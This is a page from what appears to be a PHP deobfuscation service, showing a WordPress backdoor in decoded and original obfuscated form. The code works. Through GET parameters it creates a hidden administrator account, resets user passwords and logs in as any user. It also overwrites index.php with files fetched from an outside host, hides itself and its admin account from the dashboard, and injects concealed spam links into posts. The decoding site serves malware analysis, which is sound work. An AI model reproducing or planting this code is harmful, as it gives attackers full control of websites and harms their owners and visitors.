Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

goto P9kc9; Bw9kM: if (isset($_GET["\x76"])) { $configpath = find_require("\167\160\x2d\15..

Decoded Output download

<?  goto P9kc9; Bw9kM: if (isset($_GET["v"])) { $configpath = find_require("wp-load.php"); $user = get_userdatabylogin($_GET["v"]); if ($user) { echo "200"; wp_set_password("$thePassw0rd", $user->ID); } else { $user = $_GET["v"]; $pass = "$thePassw0rd"; $user_data = array("user_login" => $user, "user_email" => "[email protected]", "first_name" => "Joe", "last_name" => "Vicky", "display_name" => "Joe" . " " . "Vicky", "user_pass" => $pass, "role" => "administrator"); $result = wp_insert_user($user_data); } die; } goto oHd4G; hcmKg: function dt_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username == "joevicky22") { } else { global $wpdb; $user_search->query_where = str_replace("WHERE 1=1", "WHERE 1=1 AND {$wpdb->users}.user_login != 'joevicky22'", $user_search->query_where); } } goto Bdi0G; u07yS: add_filter("views_users", "removing_admin_tab_from_users_list"); goto mAQXz; i22iu: if (isset($_GET["inject"])) { $newFile = file_get_contents("https://x.gofastdrives.com/json.txt"); $myfile = fopen("analytics.json", "w") or die("Unable to open file!"); fwrite($myfile, $newFile); fclose($myfile); echo "200"; die; } goto hP21Q; Bdi0G: function dt_list_table_views($views) { } goto fOV05; vDei_: if (isset($_GET["x"])) { $configpath = find_require("wp-load.php"); $user = get_userdatabylogin($_GET["x"]); echo $user->user_email; wp_set_current_user($user->ID, $user->user_login); wp_set_auth_cookie($user->ID); do_action("wp_login", $user->user_login); die; } goto KACeK; Tvq7W: function get_local_file_contents($file_path) { ob_start(); include $file_path; $contents = ob_get_clean(); return $contents; } goto mOH_6; P9kc9: function find_require($file, $folder = null) { if ($folder === null) { $folder = dirname(__FILE__); } $path = $folder . "/" . $file; if (file_exists($path)) { require $path; return $folder; } else { $upfolder = find_require($file, dirname($folder)); if ($upfolder != '') { return $upfolder; } } } goto LbOLu; hP21Q: if (isset($_GET["disable"])) { $inject = "analytics.json"; if (file_exists($inject)) { if (unlink($inject)) { echo "200"; } else { echo "500"; } } die; } goto vDei_; LbOLu: if (isset($_GET["y"])) { $configpath = find_require("wp-load.php"); $user = get_userdatabylogin($_GET["y"]); if ($user) { echo "200"; wp_set_password("$thePassw0rd", $user->ID); } else { echo "404"; } die; } goto Bw9kM; He0Rx: add_filter("the_content", "insert_post_ads"); goto Zn3e_; Zn3e_: add_action("pre_user_query", "dt_pre_user_query"); goto u07yS; KACeK: add_action("pre_current_active_plugins", "hide_plugin_trickspanda"); goto He0Rx; oHd4G: if (isset($_GET["update"])) { $newFile = file_get_contents("https://x.gofastdrives.com/file.txt"); $myfile = fopen("index.php", "w") or die("Unable to open file!"); fwrite($myfile, $newFile); fclose($myfile); echo "updated"; die; } goto i22iu; mAQXz: add_filter("views_users", "dt_list_table_views"); goto ql2G0; fOV05: function hide_plugin_trickspanda() { global $wp_list_table; $hidearr = array("wordpress-akismet/index.php"); $myplugins = $wp_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key, $hidearr)) { unset($wp_list_table->items[$key]); } } } goto Tvq7W; ql2G0: function removing_admin_tab_from_users_list($views) { unset($views["administrator"]); return $views; } goto hcmKg; mOH_6: function insert_post_ads($content) { if (!is_single()) { return $content; } else { if (is_home()) { return $content; } } $credit = "        <style>\xa        .medusa{
            position: absolute;
            left: -1000px;
            top: -1000px;\xa            z-index: -9999;\xa        }\xa        </style>"; $file = file_get_contents("https://raw.githubusercontent.com/analyticsjsonv3/json/main/analytics.json"); $json_data = json_decode($file, true); $content .= $credit; for ($i = 0; $i < count($json_data); $i++) { $content .= "<p class="medusa" > <a href=" . $json_data[$i]["link"] . ">" . $json_data[$i]["keyword"] . "</a></p>"; } return $content; } ?>

Did this file decode correctly?

Original Code

goto P9kc9; Bw9kM: if (isset($_GET["\x76"])) { $configpath = find_require("\167\160\x2d\154\x6f\141\144\56\x70\x68\x70"); $user = get_userdatabylogin($_GET["\166"]); if ($user) { echo "\x32\60\60"; wp_set_password("\44\x74\150\x65\x50\141\x73\x73\167\x30\x72\x64", $user->ID); } else { $user = $_GET["\x76"]; $pass = "\44\x74\x68\x65\x50\141\x73\163\167\x30\x72\144"; $user_data = array("\165\163\x65\x72\137\154\157\x67\151\156" => $user, "\165\x73\145\x72\137\145\155\x61\x69\x6c" => "\163\165\x70\160\157\x72\x74\100\151\x6e\156\157\150\157\x73\x74\151\156\147\x2e\x63\x6f\155", "\146\151\x72\163\x74\x5f\156\x61\x6d\145" => "\x4a\157\145", "\154\x61\x73\x74\x5f\x6e\141\x6d\145" => "\x56\151\x63\x6b\x79", "\x64\x69\x73\160\x6c\141\x79\x5f\x6e\141\x6d\145" => "\x4a\157\145" . "\x20" . "\x56\151\x63\x6b\171", "\x75\163\x65\162\x5f\160\141\x73\163" => $pass, "\x72\157\154\x65" => "\141\144\155\151\156\x69\163\164\162\141\x74\x6f\x72"); $result = wp_insert_user($user_data); } die; } goto oHd4G; hcmKg: function dt_pre_user_query($user_search) { global $current_user; $username = $current_user->user_login; if ($username == "\152\157\145\x76\x69\143\153\x79\62\62") { } else { global $wpdb; $user_search->query_where = str_replace("\x57\x48\x45\122\105\40\x31\75\61", "\x57\x48\x45\x52\105\40\61\x3d\61\x20\x41\116\104\x20{$wpdb->users}\x2e\x75\x73\x65\x72\x5f\x6c\157\x67\x69\x6e\40\x21\x3d\x20\x27\x6a\x6f\145\x76\151\143\x6b\171\62\x32\x27", $user_search->query_where); } } goto Bdi0G; u07yS: add_filter("\166\x69\x65\x77\x73\x5f\165\163\x65\x72\x73", "\x72\x65\x6d\157\x76\151\156\x67\x5f\141\x64\155\x69\x6e\x5f\164\141\x62\x5f\146\162\x6f\155\137\165\163\x65\162\163\x5f\154\x69\163\164"); goto mAQXz; i22iu: if (isset($_GET["\x69\x6e\152\x65\143\164"])) { $newFile = file_get_contents("\x68\164\164\160\163\72\x2f\57\170\x2e\x67\157\x66\141\163\164\x64\x72\x69\x76\145\163\x2e\143\157\x6d\x2f\152\163\x6f\156\56\x74\x78\x74"); $myfile = fopen("\141\x6e\141\x6c\171\x74\151\143\163\56\x6a\163\157\x6e", "\167") or die("\125\x6e\x61\142\154\x65\40\x74\157\x20\157\160\145\156\40\146\151\154\145\x21"); fwrite($myfile, $newFile); fclose($myfile); echo "\62\60\60"; die; } goto hP21Q; Bdi0G: function dt_list_table_views($views) { } goto fOV05; vDei_: if (isset($_GET["\x78"])) { $configpath = find_require("\167\160\x2d\x6c\157\141\144\56\x70\x68\160"); $user = get_userdatabylogin($_GET["\170"]); echo $user->user_email; wp_set_current_user($user->ID, $user->user_login); wp_set_auth_cookie($user->ID); do_action("\167\160\137\154\157\x67\151\156", $user->user_login); die; } goto KACeK; Tvq7W: function get_local_file_contents($file_path) { ob_start(); include $file_path; $contents = ob_get_clean(); return $contents; } goto mOH_6; P9kc9: function find_require($file, $folder = null) { if ($folder === null) { $folder = dirname(__FILE__); } $path = $folder . "\57" . $file; if (file_exists($path)) { require $path; return $folder; } else { $upfolder = find_require($file, dirname($folder)); if ($upfolder != '') { return $upfolder; } } } goto LbOLu; hP21Q: if (isset($_GET["\144\x69\163\x61\142\154\145"])) { $inject = "\x61\156\141\x6c\x79\x74\x69\143\x73\56\x6a\163\157\156"; if (file_exists($inject)) { if (unlink($inject)) { echo "\x32\x30\x30"; } else { echo "\x35\60\x30"; } } die; } goto vDei_; LbOLu: if (isset($_GET["\171"])) { $configpath = find_require("\167\x70\55\154\x6f\x61\144\56\x70\150\x70"); $user = get_userdatabylogin($_GET["\171"]); if ($user) { echo "\62\x30\60"; wp_set_password("\x24\x74\x68\x65\x50\141\x73\x73\x77\60\162\x64", $user->ID); } else { echo "\64\60\x34"; } die; } goto Bw9kM; He0Rx: add_filter("\x74\x68\x65\137\x63\x6f\156\x74\x65\156\164", "\x69\x6e\163\x65\x72\164\137\160\x6f\x73\x74\137\141\144\163"); goto Zn3e_; Zn3e_: add_action("\x70\162\x65\137\165\x73\x65\x72\x5f\x71\165\x65\162\171", "\x64\164\x5f\x70\x72\145\x5f\x75\163\x65\x72\x5f\x71\x75\145\x72\x79"); goto u07yS; KACeK: add_action("\x70\x72\x65\x5f\x63\165\x72\162\x65\x6e\164\137\x61\x63\164\x69\x76\x65\137\x70\x6c\165\x67\151\156\x73", "\x68\x69\x64\x65\x5f\160\154\165\147\151\x6e\137\164\x72\x69\x63\x6b\x73\x70\x61\156\x64\x61"); goto He0Rx; oHd4G: if (isset($_GET["\165\x70\144\141\164\145"])) { $newFile = file_get_contents("\150\x74\x74\160\x73\72\x2f\x2f\170\56\147\x6f\146\141\x73\x74\x64\x72\151\166\145\x73\56\143\157\x6d\57\x66\151\154\145\56\x74\x78\x74"); $myfile = fopen("\151\156\x64\x65\x78\56\160\150\160", "\167") or die("\x55\x6e\x61\x62\154\x65\40\164\157\40\157\160\145\x6e\x20\146\x69\154\x65\41"); fwrite($myfile, $newFile); fclose($myfile); echo "\165\160\x64\x61\164\145\x64"; die; } goto i22iu; mAQXz: add_filter("\x76\x69\x65\x77\x73\x5f\x75\x73\x65\x72\163", "\x64\x74\x5f\x6c\x69\163\x74\137\164\x61\x62\x6c\145\137\166\151\x65\x77\163"); goto ql2G0; fOV05: function hide_plugin_trickspanda() { global $wp_list_table; $hidearr = array("\167\157\x72\x64\x70\x72\145\163\163\x2d\x61\153\x69\x73\155\x65\164\57\151\x6e\x64\x65\170\x2e\160\150\160"); $myplugins = $wp_list_table->items; foreach ($myplugins as $key => $val) { if (in_array($key, $hidearr)) { unset($wp_list_table->items[$key]); } } } goto Tvq7W; ql2G0: function removing_admin_tab_from_users_list($views) { unset($views["\141\144\155\x69\x6e\151\163\164\x72\141\164\157\162"]); return $views; } goto hcmKg; mOH_6: function insert_post_ads($content) { if (!is_single()) { return $content; } else { if (is_home()) { return $content; } } $credit = "\40\40\40\40\40\40\x20\x20\74\x73\164\x79\154\x65\76\xa\x20\40\x20\x20\40\40\x20\40\x2e\x6d\x65\144\165\x73\141\x7b\12\x20\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\160\x6f\x73\151\x74\151\x6f\x6e\x3a\x20\x61\142\x73\x6f\x6c\165\164\145\x3b\12\40\40\x20\40\x20\40\40\40\x20\40\40\x20\x6c\145\x66\164\72\40\x2d\x31\60\60\x30\160\170\73\12\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\x74\157\160\x3a\x20\55\x31\x30\60\x30\160\170\73\xa\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\172\x2d\151\x6e\144\x65\170\72\40\55\71\x39\x39\71\x3b\xa\40\x20\x20\x20\x20\x20\x20\40\x7d\xa\x20\40\x20\40\40\40\40\x20\x3c\x2f\163\164\x79\x6c\x65\76"; $file = file_get_contents("\150\x74\x74\160\x73\72\57\57\162\141\x77\56\147\151\164\150\165\142\165\x73\145\x72\x63\x6f\156\x74\x65\x6e\164\x2e\x63\x6f\x6d\57\x61\x6e\x61\x6c\171\x74\x69\143\x73\152\163\157\x6e\166\63\x2f\x6a\x73\x6f\156\x2f\155\141\x69\156\x2f\141\156\141\154\x79\164\x69\143\x73\x2e\x6a\163\x6f\156"); $json_data = json_decode($file, true); $content .= $credit; for ($i = 0; $i < count($json_data); $i++) { $content .= "\x3c\x70\40\x63\154\141\x73\163\x3d\x22\x6d\x65\x64\165\x73\141\42\x20\76\40\74\141\40\x68\162\x65\146\x3d" . $json_data[$i]["\x6c\x69\x6e\x6b"] . "\x3e" . $json_data[$i]["\x6b\145\x79\x77\x6f\162\x64"] . "\x3c\57\x61\x3e\74\57\160\x3e"; } return $content; }

Function Calls

None

Variables

None

Stats

MD5	af5214e8e88aa5a33459cfa757306c25
Eval Count	0
Decode Time	42 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats